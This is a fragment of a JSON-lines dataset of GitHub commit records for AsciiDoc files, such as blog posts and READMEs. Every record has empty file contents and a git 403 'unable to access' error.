2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ab6b7425bc485391df7a37262dc94ef304fcceb2","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bac589bcd6483c684b6cf4d02222adf800659d5b","subject":"Update 2016-05-12-ORM-tulza.adoc","message":"Update 2016-05-12-ORM-tulza.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-12-ORM-tulza.adoc","new_file":"_posts\/2016-05-12-ORM-tulza.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b713d51ef2c3237830ae9fb4158939fa3cf4bbe2","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5c67861cef41e89cc5f4a1c33beeb8c943663ac","subject":"travis blog post","message":"travis blog post\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-18-Travis_CI.adoc","new_file":"_posts\/2017-08-18-Travis_CI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7a3f30b2ce2a6bfda22471314ceb742a8fb988c","subject":"y2b create post PS Vita Import Guide (PlayStation Vita)","message":"y2b create post PS Vita Import Guide (PlayStation Vita)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-31-PS-Vita-Import-Guide-PlayStation-Vita.adoc","new_file":"_posts\/2011-12-31-PS-Vita-Import-Guide-PlayStation-Vita.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c25a3c6674f6870a47076a11803615e2deb82df","subject":"add 
mvp gen doc","message":"add mvp gen doc\n","repos":"gengjiawen\/AndroidHelper,gengjiawen\/AndroidHelper","old_file":"codegen_util\/mvp_gen\/README.adoc","new_file":"codegen_util\/mvp_gen\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gengjiawen\/AndroidHelper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2db2a09107a05efe1e0ee78807dee1f122dc028","subject":"add company","message":"add company\n","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e50390f8ae647830c7809373db9b56369d799ee4","subject":"Publish 2016-11-3-you-know-what.adoc","message":"Publish 2016-11-3-you-know-what.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"2016-11-3-you-know-what.adoc","new_file":"2016-11-3-you-know-what.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c19fd8e593cc9affa58d14bc209e20206e995bd6","subject":"FORGE-2.15.1.Final: Add manual for Cygwin+Wildfly","message":"FORGE-2.15.1.Final: Add manual for Cygwin+Wildfly\n","repos":"agoncal\/docs,addonis1990\/docs,addonis1990\/docs,luiz158\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,forge\/docs","old_file":"get_started\/Cygwin_Manual.asciidoc","new_file":"get_started\/Cygwin_Manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b823f8e58c8889e60104150d8228bb0ef8aca6a6","subject":"y2b create post iPhone 6 - How Thin?","message":"y2b create post iPhone 6 - How Thin?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-04-28-iPhone-6--How-Thin.adoc","new_file":"_posts\/2014-04-28-iPhone-6--How-Thin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78e4135f08ff394ed1051ff3a3dc1c9a06b55ba0","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f4408f9438f966a67d9cf91bf33c19a44e78c70","subject":"add deref","message":"add 
deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/11\/12\/deref.adoc","new_file":"content\/news\/2021\/11\/12\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cd8e518591e48ae2f179f40d8b28a7d7e570da41","subject":"doc(README): add chinese version","message":"doc(README): add chinese version\n","repos":"TheAshwanik\/new,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io,TheAshwanik\/new,alchapone\/alchapone.github.io,TheAshwanik\/new,alchapone\/alchapone.github.io,lametaweb\/lametaweb.github.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,anthonny\/dev.hubpress.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,Git-Host\/Git-Host.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,alchapone\/alchapone.github.io,Git-Host\/Git-Host.io,demo-hubpress\/demo-hubpress.github.io","old_file":"docs\/README-zh.adoc","new_file":"docs\/README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"255148a302f2cd1a93bd811e50f413c40083df08","subject":"Update 2015-07-16-The-Arrival-Part-2.adoc","message":"Update 2015-07-16-The-Arrival-Part-2.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-07-16-The-Arrival-Part-2.adoc","new_file":"_posts\/2015-07-16-The-Arrival-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82cdbabde7501866b29afdff2e215a3a05e98ca","subject":"Add files","message":"Add files","repos":"jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7,jmunoz298\/atlasti","old_file":"01-Introduccion.adoc","new_file":"01-Introduccion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmunoz298\/atlasti.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"254c621f49d7c99ff3a7d8b2a4c96e2c4980506c","subject":"Update 2015-09-21-SQL-review.adoc","message":"Update 2015-09-21-SQL-review.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-SQL-review.adoc","new_file":"_posts\/2015-09-21-SQL-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"928b15862cb66ca10f46a5178028f9218d8cf440","subject":"Update 2016-10-19-algo-10164.adoc","message":"Update 
2016-10-19-algo-10164.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-19-algo-10164.adoc","new_file":"_posts\/2016-10-19-algo-10164.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2384cb1fafe01bb06b110acc9968dd304db43fa8","subject":"Update 2017-01-17-First-Post.adoc","message":"Update 2017-01-17-First-Post.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-17-First-Post.adoc","new_file":"_posts\/2017-01-17-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cc02e1073510734bd84cc47d11d167f4cc6cee4","subject":"Update 2020-02-05-Git-Habits.adoc","message":"Update 2020-02-05-Git-Habits.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2020-02-05-Git-Habits.adoc","new_file":"_posts\/2020-02-05-Git-Habits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c535df731ab491f8188d47fbc3070ef4dbff6670","subject":"y2b create post Ferrari Headphones CES 2012","message":"y2b create post Ferrari Headphones CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Ferrari-Headphones-CES-2012.adoc","new_file":"_posts\/2012-01-12-Ferrari-Headphones-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b34db85641efc840451e2be3e5f60a0bdfb8b88d","subject":"Des corrections apr\u00e8s premier revision","message":"Des corrections apr\u00e8s premier revision","repos":"uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"base\/tests\/selenium\/testscases\/score_encoding.adoc","new_file":"base\/tests\/selenium\/testscases\/score_encoding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"82dd6fe7ec4db92a8d7c86912923dad545cf06fe","subject":"Added Binding doc","message":"Added Binding 
doc\n","repos":"christophd\/camel,alvinkwekel\/camel,davidkarlsen\/camel,gnodet\/camel,nicolaferraro\/camel,DariusX\/camel,Fabryprog\/camel,apache\/camel,mcollovati\/camel,cunningt\/camel,pax95\/camel,tadayosi\/camel,onders86\/camel,christophd\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,DariusX\/camel,Fabryprog\/camel,tdiesler\/camel,nicolaferraro\/camel,alvinkwekel\/camel,onders86\/camel,pmoerenhout\/camel,pax95\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,ullgren\/camel,gnodet\/camel,ullgren\/camel,tadayosi\/camel,mcollovati\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,objectiser\/camel,zregvart\/camel,DariusX\/camel,objectiser\/camel,adessaigne\/camel,pmoerenhout\/camel,kevinearls\/camel,objectiser\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,mcollovati\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,apache\/camel,tdiesler\/camel,objectiser\/camel,zregvart\/camel,davidkarlsen\/camel,apache\/camel,CodeSmell\/camel,cunningt\/camel,ullgren\/camel,kevinearls\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,zregvart\/camel,gnodet\/camel,kevinearls\/camel,mcollovati\/camel,tadayosi\/camel,onders86\/camel,cunningt\/camel,adessaigne\/camel,zregvart\/camel,punkhorn\/camel-upstream,cunningt\/camel,CodeSmell\/camel,kevinearls\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,Fabryprog\/camel,gnodet\/camel,tadayosi\/camel,ullgren\/camel,pax95\/camel,DariusX\/camel,nicolaferraro\/camel,alvinkwekel\/camel,alvinkwekel\/camel,apache\/camel,tdiesler\/camel,nikhilvibhav\/camel,cunningt\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,CodeSmell\/camel,CodeSmell\/camel,kevinearls\/camel,tadayosi\/camel,adessaigne\/camel,punkhorn\/camel-upstream,kevinearls\/camel,onders86\/camel,pax95\/camel,onders86\/camel,pmoerenhout\/camel,davidkarlsen\/camel,adessaigne\/camel","old_file":"docs\/user-manual\/en\/binding.adoc","new_file":"docs\/user-manual\/en\/binding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9333047605baadadc2214e310c4316770c6b53f7","subject":"Update 2019-11-15-red-paint.adoc","message":"Update 2019-11-15-red-paint.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-11-15-red-paint.adoc","new_file":"_posts\/2019-11-15-red-paint.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed492a22799667acd83c28cf0eb1133d96dcb516","subject":"Ver 18-12","message":"Ver 18-12\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"276fb0ffbc8aee392ecf2253cfe241f46dbce480","subject":"Add numbering to chapters and sections","message":"Add numbering to chapters and 
sections","repos":"RainerWinkler\/Moose-Diagram","old_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_file":"Documentation\/ArchitectureDocumentation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RainerWinkler\/Moose-Diagram.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddff239da0a812346189aa6becc944b1b09f0a84","subject":"Update 2015-08-14-First.adoc","message":"Update 2015-08-14-First.adoc","repos":"shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io,shinchiro\/shinchiro.github.io","old_file":"_posts\/2015-08-14-First.adoc","new_file":"_posts\/2015-08-14-First.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/shinchiro\/shinchiro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"237203fce31ea9b1ad923088cd6fac94893186f1","subject":"Update 2017-01-27-Model.adoc","message":"Update 2017-01-27-Model.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Model.adoc","new_file":"_posts\/2017-01-27-Model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b1ec27fdf452d2d20ada6cd5e08fd3c6ae8d1e1","subject":"Delete README-pt.adoc","message":"Delete README-pt.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-pt.adoc","new_file":"README-pt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a3c1f34f9275f6abc255ff48f0340778ee12b92","subject":"Opt, link","message":"Opt, link\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"SWT.adoc","new_file":"SWT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"115f195951f5c4ebf4a895cd05b6e58ffc411aa5","subject":"add README","message":"add README\n\nSigned-off-by: Takeshi Banse <db42e37a7cb27ca6628f344993036144160b0931@laafc.net>\n","repos":"hchbaw\/zce.zsh","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hchbaw\/zce.zsh.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"6d6269bd6050b8eec58ad085aa4480bc842aa94c","subject":"Try out asciidoc","message":"Try out asciidoc\n","repos":"cloud-of-things\/cot-java-rest-sdk","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cloud-of-things\/cot-java-rest-sdk.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c78f5de22f3ce58e65a4423842dc5d904f65ce74","subject":"Create README.asciidoc","message":"Create 
README.asciidoc","repos":"GoAKL\/GoAKL,GoAKL\/GoAKL","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoAKL\/GoAKL.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f74a8ebfa812849117526147710d21e734001c7b","subject":"Update 2016-01-19-m.adoc","message":"Update 2016-01-19-m.adoc","repos":"Mynor-Briones\/mynor-briones.github.io,Mynor-Briones\/mynor-briones.github.io,Mynor-Briones\/mynor-briones.github.io","old_file":"_posts\/2016-01-19-m.adoc","new_file":"_posts\/2016-01-19-m.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mynor-Briones\/mynor-briones.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"931e4a10837de37a4be8412126a0be830fa7925e","subject":"Document how to build Cypher style guide","message":"Document how to build Cypher style guide\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"docs\/build\/README.adoc","new_file":"docs\/build\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"187ca985e1a7c08052a0a7762dad669fd494687e","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a69cfe82ccad87c35cb3e4e12df5b62740892f35","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8db0b566b33d9ad1138e20a7d1afd0bb7d76acf6","subject":"create post Thank you.","message":"create post Thank you.","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Thank-you..adoc","new_file":"_posts\/2018-02-26-Thank-you..adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ee4594e14b4cdd060cd1d888b04c0dea9edf979","subject":"docs release update","message":"docs release 
update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2ea66f6b40055f6d76f871ede14e7161dd93515","subject":"Update 2015-08-21-Blog-Title.adoc","message":"Update 2015-08-21-Blog-Title.adoc","repos":"alexgaspard\/alexgaspard.github.io,alexgaspard\/alexgaspard.github.io,alexgaspard\/alexgaspard.github.io","old_file":"_posts\/2015-08-21-Blog-Title.adoc","new_file":"_posts\/2015-08-21-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexgaspard\/alexgaspard.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc7d1066e4b6004e7112966b995ba795672c1057","subject":"Add a symlink to give the readme a type extension (let's see what github makes of it ^^)","message":"Add a symlink to give the readme a type extension (let's see what github makes of it ^^)\n","repos":"bnkr\/nerve,bnkr\/nerve,bnkr\/nerve","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bnkr\/nerve.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"c7e3df8802fea77f2c5e371444c1f5896a362ab8","subject":"first cut of a readme","message":"first cut of a readme\n","repos":"simpligility\/maven-repository-tools,simpligility\/maven-repository-tools","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simpligility\/maven-repository-tools.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5c220c86dd20d5ca3f0b7b55ef5e4bb6f7fd2ead","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49db48120b049eac5d8bf5b4483f920c579ba786","subject":"Update 2015-07-27-Hello-World.adoc","message":"Update 2015-07-27-Hello-World.adoc","repos":"juliardi\/juliardi.github.io,juliardi\/juliardi.github.io,juliardi\/juliardi.github.io","old_file":"_posts\/2015-07-27-Hello-World.adoc","new_file":"_posts\/2015-07-27-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juliardi\/juliardi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8936a710a66770b0cb0ad8a48ffe65f789be262b","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 
2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98d509e9b0d7ec23a5aae87a6481121e44e35027","subject":"Update 2017-06-02-Azure-4.adoc","message":"Update 2017-06-02-Azure-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-02-Azure-4.adoc","new_file":"_posts\/2017-06-02-Azure-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80396a2aef92d22e1b450ce47ee7fb1146986b6e","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be62d1a6079163f150ee8719629c7a460be1db6","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cbb2ff0160213d939d2b98a38cc01d6b03c9c4a","subject":"Update 2017-05-28-Hello-World.adoc","message":"Update 